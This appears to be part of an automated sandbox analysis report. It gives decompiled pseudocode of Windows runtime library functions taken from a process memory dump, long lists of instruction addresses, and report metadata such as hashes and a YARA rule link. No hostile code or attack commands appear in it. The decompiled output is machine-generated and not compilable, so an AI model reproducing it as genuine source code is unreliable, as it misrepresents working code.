										_t331 = E04D551BE(_t286,  *((intOrPtr*)(_v48 + 0x4cb166c)), _a16, _t324, _t331, __eflags, _a20, _a24);
										_v52 = _t331;
										break;
									} else {
										_t249 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t249 = _t249 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t331;
						__eflags = _t331;
						if(_t331 < 0) {
							__eflags = _t331 - 0xc0000100;
							if(_t331 == 0xc0000100) {
								_t296 = _a4;
								__eflags = _t296;
								if(_t296 != 0) {
									_v36 = _t296;
									__eflags =  *_t296 - _t324;
									if( *_t296 == _t324) {
										_t331 = 0xc0000100;
										goto L76;
									} else {
										_t312 =  *((intOrPtr*)(_v44 + 0x30));
										_t251 =  *((intOrPtr*)(_t312 + 0x10));
										__eflags =  *((intOrPtr*)(_t251 + 0x48)) - _t296;
										if( *((intOrPtr*)(_t251 + 0x48)) == _t296) {
											__eflags =  *(_t312 + 0x1c);
											if( *(_t312 + 0x1c) == 0) {
												L106:
												_t331 = E04D02AE4( &_v36, _a8, _t286, _a16, _a20, _a24);
												_v32 = _t331;
												__eflags = _t331 - 0xc0000100;
												if(_t331 != 0xc0000100) {
													goto L69;
												} else {
													_t324 = 1;
													_t296 = _v36;
													goto L75;
												}
											} else {
												_t254 = E04CE6600( *(_t312 + 0x1c));
												__eflags = _t254;
												if(_t254 != 0) {
													goto L106;
												} else {
													_t296 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t331 = E04D02C50(_t296, _a8, _t286, _a16, _a20, _a24, _t324);
											L76:
											_v32 = _t331;
											goto L69;
										}
									}
									goto L108;
								} else {
									E04CEEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t331 = _a24;
									_t261 = E04D02AE4( &_v36, _a8, _t286, _a16, _a20, _t331);
									_v32 = _t261;
									__eflags = _t261 - 0xc0000100;
									if(_t261 == 0xc0000100) {
										_v32 = E04D02C50(_v36, _a8, _t286, _a16, _a20, _t331, 1);
									}
									_v8 = _t324;
									E04D02ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t247 = _t331;
					}
					L70:
					return E04D2D0D1(_t247);
				}
				L108:
			}


















































                                                                                            0x04d02584
                                                                                            0x04d02586
                                                                                            0x04d02590
                                                                                            0x04d02596
                                                                                            0x04d02597
                                                                                            0x04d02598
                                                                                            0x04d02599
                                                                                            0x04d0259e
                                                                                            0x04d025a4
                                                                                            0x04d025a9
                                                                                            0x04d025ac
                                                                                            0x04d025ae
                                                                                            0x04d025b1
                                                                                            0x04d025b2
                                                                                            0x04d025b5
                                                                                            0x04d025b8
                                                                                            0x04d025bb
                                                                                            0x04d025bc
                                                                                            0x04d025bf
                                                                                            0x04d025c2
                                                                                            0x04d025c5
                                                                                            0x04d025c6
                                                                                            0x04d025cb
                                                                                            0x04d025ce
                                                                                            0x04d025d8
                                                                                            0x04d025dd
                                                                                            0x04d025de
                                                                                            0x04d025e1
                                                                                            0x04d025e3
                                                                                            0x04d025e9
                                                                                            0x04d026da
                                                                                            0x04d026da
                                                                                            0x04d026dd
                                                                                            0x04d026e2
                                                                                            0x04d45b56
                                                                                            0x00000000
                                                                                            0x04d026e8
                                                                                            0x04d026f9
                                                                                            0x04d026fb
                                                                                            0x04d026fe
                                                                                            0x04d02700
                                                                                            0x04d45b60
                                                                                            0x00000000
                                                                                            0x04d02706
                                                                                            0x04d02706
                                                                                            0x04d0270a
                                                                                            0x04d0270a
                                                                                            0x04d0270d
                                                                                            0x04d02713
                                                                                            0x04d02716
                                                                                            0x04d02718
                                                                                            0x04d0271c
                                                                                            0x04d0271e
                                                                                            0x04d45b6c
                                                                                            0x04d45b6f
                                                                                            0x04d45b7f
                                                                                            0x04d45b89
                                                                                            0x04d45b8e
                                                                                            0x04d45b93
                                                                                            0x04d45b96
                                                                                            0x04d45b9c
                                                                                            0x04d45ba0
                                                                                            0x04d45ba3
                                                                                            0x04d45bab
                                                                                            0x04d45bb0
                                                                                            0x04d45bb3
                                                                                            0x04d45bb3
                                                                                            0x04d45ba3
                                                                                            0x04d02724
                                                                                            0x04d02726
                                                                                            0x04d02729
                                                                                            0x04d0272c
                                                                                            0x04d0279d
                                                                                            0x04d0279d
                                                                                            0x04d027a0
                                                                                            0x04d027a2
                                                                                            0x00000000
                                                                                            0x04d0272e
                                                                                            0x04d0272e
                                                                                            0x04d02731
                                                                                            0x04d02734
                                                                                            0x04d02734
                                                                                            0x04d02736
                                                                                            0x04d45bc1
                                                                                            0x04d45bc1
                                                                                            0x04d45bc4
                                                                                            0x00000000
                                                                                            0x04d45bca
                                                                                            0x04d45bca
                                                                                            0x04d45bcd
                                                                                            0x00000000
                                                                                            0x04d45bd3
                                                                                            0x00000000
                                                                                            0x04d45bd3
                                                                                            0x04d45bcd
                                                                                            0x04d0273c
                                                                                            0x04d0273c
                                                                                            0x04d02742
                                                                                            0x04d02747
                                                                                            0x04d0274a
                                                                                            0x04d0274d
                                                                                            0x04d02750
                                                                                            0x00000000
                                                                                            0x04d02756
                                                                                            0x04d02756
                                                                                            0x00000000
                                                                                            0x04d02902
                                                                                            0x04d02908
                                                                                            0x04d0290b
                                                                                            0x00000000
                                                                                            0x04d02911
                                                                                            0x04d0291c
                                                                                            0x04d02921
                                                                                            0x00000000
                                                                                            0x04d02921
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d02880
                                                                                            0x04d02887
                                                                                            0x04d0288c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d02805
                                                                                            0x04d0280a
                                                                                            0x04d02814
                                                                                            0x04d02816
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d0281e
                                                                                            0x04d02821
                                                                                            0x04d02823
                                                                                            0x00000000
                                                                                            0x04d02829
                                                                                            0x04d02829
                                                                                            0x04d02831
                                                                                            0x04d0283c
                                                                                            0x04d0283e
                                                                                            0x00000000
                                                                                            0x04d0283e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d0284e
                                                                                            0x04d02850
                                                                                            0x04d02851
                                                                                            0x04d02854
                                                                                            0x04d02857
                                                                                            0x04d0285a
                                                                                            0x04d0285c
                                                                                            0x04d0285d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d0275d
                                                                                            0x04d02761
                                                                                            0x00000000
                                                                                            0x04d02767
                                                                                            0x04d0276e
                                                                                            0x04d02773
                                                                                            0x04d02773
                                                                                            0x04d02776
                                                                                            0x04d02778
                                                                                            0x04d0277e
                                                                                            0x04d0277e
                                                                                            0x04d02781
                                                                                            0x04d02781
                                                                                            0x04d02783
                                                                                            0x04d02784
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d45bd8
                                                                                            0x04d45bde
                                                                                            0x04d45be4
                                                                                            0x04d45be6
                                                                                            0x04d45be8
                                                                                            0x04d45be9
                                                                                            0x04d45bee
                                                                                            0x04d45bf8
                                                                                            0x04d45bff
                                                                                            0x04d45c01
                                                                                            0x04d45c04
                                                                                            0x04d45c07
                                                                                            0x04d45c0b
                                                                                            0x04d45c0d
                                                                                            0x04d45c0d
                                                                                            0x04d45c15
                                                                                            0x04d45c18
                                                                                            0x04d45c1b
                                                                                            0x04d45c1b
                                                                                            0x04d45c1e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d028c3
                                                                                            0x04d028c8
                                                                                            0x04d028d2
                                                                                            0x04d028d4
                                                                                            0x04d028d8
                                                                                            0x04d028db
                                                                                            0x04d45c26
                                                                                            0x04d45c28
                                                                                            0x04d45c2d
                                                                                            0x04d45c2d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d45c34
                                                                                            0x04d45c36
                                                                                            0x04d45c49
                                                                                            0x04d45c4e
                                                                                            0x04d45c54
                                                                                            0x04d45c5b
                                                                                            0x04d45c5d
                                                                                            0x04d45c60
                                                                                            0x04d02788
                                                                                            0x04d02788
                                                                                            0x04d0278b
                                                                                            0x04d0278e
                                                                                            0x04d0278e
                                                                                            0x04d0278e
                                                                                            0x04d02791
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d02756
                                                                                            0x04d02750
                                                                                            0x00000000
                                                                                            0x04d02794
                                                                                            0x04d02794
                                                                                            0x04d02795
                                                                                            0x04d02798
                                                                                            0x04d02798
                                                                                            0x00000000
                                                                                            0x04d02734
                                                                                            0x04d0272c
                                                                                            0x04d02700
                                                                                            0x04d025ef
                                                                                            0x04d025ef
                                                                                            0x04d025ef
                                                                                            0x04d025f2
                                                                                            0x04d025f8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d025fe
                                                                                            0x00000000
                                                                                            0x04d028e6
                                                                                            0x04d028ec
                                                                                            0x04d028ef
                                                                                            0x04d028f5
                                                                                            0x04d028f8
                                                                                            0x04d028f8
                                                                                            0x00000000
                                                                                            0x04d028f8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d02866
                                                                                            0x04d02866
                                                                                            0x04d02876
                                                                                            0x04d02879
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d027e0
                                                                                            0x04d027e7
                                                                                            0x04d027e9
                                                                                            0x04d027eb
                                                                                            0x04d45afd
                                                                                            0x00000000
                                                                                            0x04d45afd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d02633
                                                                                            0x04d02638
                                                                                            0x04d0263b
                                                                                            0x04d0263c
                                                                                            0x04d0263e
                                                                                            0x04d02640
                                                                                            0x04d02642
                                                                                            0x04d02647
                                                                                            0x04d02649
                                                                                            0x04d0264e
                                                                                            0x04d02650
                                                                                            0x04d02653
                                                                                            0x04d02659
                                                                                            0x04d026a2
                                                                                            0x04d026a7
                                                                                            0x04d026ac
                                                                                            0x04d026b2
                                                                                            0x04d45b11
                                                                                            0x04d45b15
                                                                                            0x04d45b17
                                                                                            0x00000000
                                                                                            0x04d026b8
                                                                                            0x04d026b8
                                                                                            0x04d026ba
                                                                                            0x04d027a6
                                                                                            0x04d027a6
                                                                                            0x04d027a9
                                                                                            0x04d027ab
                                                                                            0x04d027b9
                                                                                            0x04d027b9
                                                                                            0x04d027be
                                                                                            0x04d027c1
                                                                                            0x04d027c3
                                                                                            0x04d027c5
                                                                                            0x04d027c7
                                                                                            0x04d45c74
                                                                                            0x04d45c79
                                                                                            0x04d45c79
                                                                                            0x04d027c7
                                                                                            0x00000000
                                                                                            0x04d026c0
                                                                                            0x04d026c0
                                                                                            0x04d026c3
                                                                                            0x04d026c6
                                                                                            0x04d026c6
                                                                                            0x04d026c9
                                                                                            0x04d026c9
                                                                                            0x00000000
                                                                                            0x04d026c9
                                                                                            0x04d026ba
                                                                                            0x04d0265b
                                                                                            0x04d0265b
                                                                                            0x04d0265e
                                                                                            0x04d02667
                                                                                            0x04d0266d
                                                                                            0x04d02677
                                                                                            0x04d0267c
                                                                                            0x04d0267f
                                                                                            0x04d02681
                                                                                            0x04d45b49
                                                                                            0x04d45b4e
                                                                                            0x04d027cd
                                                                                            0x04d027d0
                                                                                            0x04d027d1
                                                                                            0x04d027d2
                                                                                            0x04d027d4
                                                                                            0x04d027dd
                                                                                            0x04d02687
                                                                                            0x04d02687
                                                                                            0x04d0268a
                                                                                            0x04d0268b
                                                                                            0x04d0268e
                                                                                            0x04d0268f
                                                                                            0x04d02691
                                                                                            0x04d02696
                                                                                            0x04d02698
                                                                                            0x04d0269d
                                                                                            0x04d0269f
                                                                                            0x00000000
                                                                                            0x04d0269f
                                                                                            0x04d02681
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d02846
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d02605
                                                                                            0x04d0260a
                                                                                            0x04d0260c
                                                                                            0x04d02611
                                                                                            0x04d02616
                                                                                            0x04d02619
                                                                                            0x04d02619
                                                                                            0x04d0261e
                                                                                            0x00000000
                                                                                            0x04d02624
                                                                                            0x04d02627
                                                                                            0x04d02627
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d45b1f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d02894
                                                                                            0x04d0289b
                                                                                            0x04d0289d
                                                                                            0x04d028a1
                                                                                            0x04d45b2b
                                                                                            0x04d45b2e
                                                                                            0x04d45b2e
                                                                                            0x04d028a7
                                                                                            0x04d028a9
                                                                                            0x04d45b04
                                                                                            0x04d45b09
                                                                                            0x04d45b09
                                                                                            0x04d45b09
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d45b35
                                                                                            0x04d45b3c
                                                                                            0x04d028fb
                                                                                            0x04d028fb
                                                                                            0x04d026cc
                                                                                            0x04d026cc
                                                                                            0x04d026d0
                                                                                            0x00000000
                                                                                            0x04d026d2
                                                                                            0x04d026d2
                                                                                            0x00000000
                                                                                            0x04d026d2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d025fe
                                                                                            0x04d0292d
                                                                                            0x04d02930
                                                                                            0x04d02935
                                                                                            0x04d02937
                                                                                            0x04d0293e
                                                                                            0x04d0293f
                                                                                            0x04d02942
                                                                                            0x04d0294a
                                                                                            0x04d0294f
                                                                                            0x04d02957
                                                                                            0x04d0295b
                                                                                            0x04d02962
                                                                                            0x04d02963
                                                                                            0x04d0296e
                                                                                            0x04d0296f
                                                                                            0x04d02972
                                                                                            0x04d02973
                                                                                            0x04d02977
                                                                                            0x04d0297a
                                                                                            0x04d0297b
                                                                                            0x04d0297d
                                                                                            0x04d0297e
                                                                                            0x04d0297f
                                                                                            0x04d02980
                                                                                            0x04d02981
                                                                                            0x04d02982
                                                                                            0x04d02983
                                                                                            0x04d02984
                                                                                            0x04d02985
                                                                                            0x04d02986
                                                                                            0x04d02987
                                                                                            0x04d02988
                                                                                            0x04d02989
                                                                                            0x04d0298a
                                                                                            0x04d0298b
                                                                                            0x04d0298c
                                                                                            0x04d0298d
                                                                                            0x04d0298e
                                                                                            0x04d0298f
                                                                                            0x04d02990
                                                                                            0x04d02992
                                                                                            0x04d02997
                                                                                            0x04d029a3
                                                                                            0x04d029a6
                                                                                            0x04d029ab
                                                                                            0x04d029ad
                                                                                            0x04d029b0
                                                                                            0x04d029b2
                                                                                            0x04d45c80
                                                                                            0x04d029b8
                                                                                            0x04d029b8
                                                                                            0x04d029bb
                                                                                            0x04d029c0
                                                                                            0x04d029c5
                                                                                            0x04d029c6
                                                                                            0x04d029c6
                                                                                            0x04d029c9
                                                                                            0x04d029cb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d029cd
                                                                                            0x04d029d0
                                                                                            0x04d029d9
                                                                                            0x04d029db
                                                                                            0x04d029dd
                                                                                            0x04d02a7f
                                                                                            0x04d02a84
                                                                                            0x04d02a87
                                                                                            0x04d02a89
                                                                                            0x04d45ca1
                                                                                            0x04d45ca3
                                                                                            0x00000000
                                                                                            0x04d02a8f
                                                                                            0x04d02a8f
                                                                                            0x00000000
                                                                                            0x04d02a8f
                                                                                            0x00000000
                                                                                            0x04d029e3
                                                                                            0x04d029e3
                                                                                            0x04d029e3
                                                                                            0x00000000
                                                                                            0x04d029e3
                                                                                            0x04d029dd
                                                                                            0x00000000
                                                                                            0x04d029db
                                                                                            0x04d029e6
                                                                                            0x04d029e9
                                                                                            0x04d029eb
                                                                                            0x04d029ed
                                                                                            0x04d029f3
                                                                                            0x04d029f5
                                                                                            0x04d029f8
                                                                                            0x04d029fa
                                                                                            0x04d02a97
                                                                                            0x04d02a9a
                                                                                            0x04d02a9d
                                                                                            0x04d02add
                                                                                            0x00000000
                                                                                            0x04d02a9f
                                                                                            0x04d02aa2
                                                                                            0x04d02aa5
                                                                                            0x04d02aa8
                                                                                            0x04d02aab
                                                                                            0x04d45cab
                                                                                            0x04d45caf
                                                                                            0x04d45cc5
                                                                                            0x04d45cda
                                                                                            0x04d45cdc
                                                                                            0x04d45cdf
                                                                                            0x04d45ce5
                                                                                            0x00000000
                                                                                            0x04d45ceb
                                                                                            0x04d45ced
                                                                                            0x04d45cee
                                                                                            0x00000000
                                                                                            0x04d45cee
                                                                                            0x04d45cb1
                                                                                            0x04d45cb4
                                                                                            0x04d45cb9
                                                                                            0x04d45cbb
                                                                                            0x00000000
                                                                                            0x04d45cbd
                                                                                            0x04d45cbd
                                                                                            0x00000000
                                                                                            0x04d45cbd
                                                                                            0x04d45cbb
                                                                                            0x04d02ab1
                                                                                            0x04d02ab1
                                                                                            0x04d02ac4
                                                                                            0x04d02ac6
                                                                                            0x04d02ac6
                                                                                            0x00000000
                                                                                            0x04d02ac6
                                                                                            0x04d02aab
                                                                                            0x00000000
                                                                                            0x04d02a00
                                                                                            0x04d02a09
                                                                                            0x04d02a0e
                                                                                            0x04d02a21
                                                                                            0x04d02a24
                                                                                            0x04d02a35
                                                                                            0x04d02a3a
                                                                                            0x04d02a3d
                                                                                            0x04d02a42
                                                                                            0x04d02a59
                                                                                            0x04d02a59
                                                                                            0x04d02a5c
                                                                                            0x04d02a5f
                                                                                            0x04d02a5f
                                                                                            0x04d029fa
                                                                                            0x04d029f3
                                                                                            0x04d02a64
                                                                                            0x04d02a64
                                                                                            0x04d02a6b
                                                                                            0x04d02a6b
                                                                                            0x04d02a6d
                                                                                            0x04d02a72
                                                                                            0x04d02a72
                                                                                            0x00000000

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: PATH
                                                                                            • API String ID: 0-1036084923
                                                                                            • Opcode ID: 594d0f00b908b6989fa75776c2863656fe388871cbca03e0e2ef17f38d6f5a72
                                                                                            • Instruction ID: 75fcd666e5b36226cdd83605988d51ccc4df1a8980c4e89ce38ea87abf5c1be4
                                                                                            • Opcode Fuzzy Hash: 594d0f00b908b6989fa75776c2863656fe388871cbca03e0e2ef17f38d6f5a72
                                                                                            • Instruction Fuzzy Hash: D9C1CF71E01219EBDB24DF98D894BBEB7B1FF88704F548069E841AB290E734BD01DB60
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04D0FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 80%
                                                                                            			E04D0FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E04CEEEF0(0x4dc7b60);
					_t134 =  *0x4dc7b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x4dc7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x4dc7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E04CE6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E04CE76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E04D78938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E04CDB150();
													}
													_t116 = E04D76D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E04CE75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x4dc8638; // 0xd12c90
																	_t122 = L04CE38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E04CE76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E04CE76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L04D0FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L04CE70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E04D0FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E04D0FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E04D0FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E04D0FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E04D0FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x4dc7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x4dc7b84 = _t75;
						_t73 = E04CEEB70(_t134, 0x4dc7b60);
						if( *0x4dc7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E04CEFF60( *0x4dc7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                            0x04d0fab0
                                                                                            0x04d0fab2
                                                                                            0x04d0fab3
                                                                                            0x04d0fab4
                                                                                            0x04d0fabc
                                                                                            0x04d0fac0
                                                                                            0x04d0fb14
                                                                                            0x04d0fb17
                                                                                            0x04d0fac2
                                                                                            0x04d0fac8
                                                                                            0x04d0facd
                                                                                            0x04d0fad3
                                                                                            0x04d0fad3
                                                                                            0x04d0fadd
                                                                                            0x04d0fb18
                                                                                            0x04d0fb1b
                                                                                            0x04d0fb1d
                                                                                            0x04d0fb1e
                                                                                            0x04d0fb1f
                                                                                            0x04d0fb20
                                                                                            0x04d0fb21
                                                                                            0x04d0fb22
                                                                                            0x04d0fb23
                                                                                            0x04d0fb24
                                                                                            0x04d0fb25
                                                                                            0x04d0fb26
                                                                                            0x04d0fb27
                                                                                            0x04d0fb28
                                                                                            0x04d0fb29
                                                                                            0x04d0fb2a
                                                                                            0x04d0fb2b
                                                                                            0x04d0fb2c
                                                                                            0x04d0fb2d
                                                                                            0x04d0fb2e
                                                                                            0x04d0fb2f
                                                                                            0x04d0fb3a
                                                                                            0x04d0fb3b
                                                                                            0x04d0fb3e
                                                                                            0x04d0fb41
                                                                                            0x04d0fb44
                                                                                            0x04d0fb47
                                                                                            0x04d0fb4a
                                                                                            0x04d0fb4d
                                                                                            0x04d0fb53
                                                                                            0x04d4bdcb
                                                                                            0x04d4bdcb
                                                                                            0x04d0fb59
                                                                                            0x04d0fb5b
                                                                                            0x04d0fb5b
                                                                                            0x04d0fb5e
                                                                                            0x04d4bdd5
                                                                                            0x04d4bdd8
                                                                                            0x00000000
                                                                                            0x04d4bdda
                                                                                            0x00000000
                                                                                            0x04d4bdda
                                                                                            0x04d0fb64
                                                                                            0x04d0fb64
                                                                                            0x04d0fb64
                                                                                            0x04d0fb67
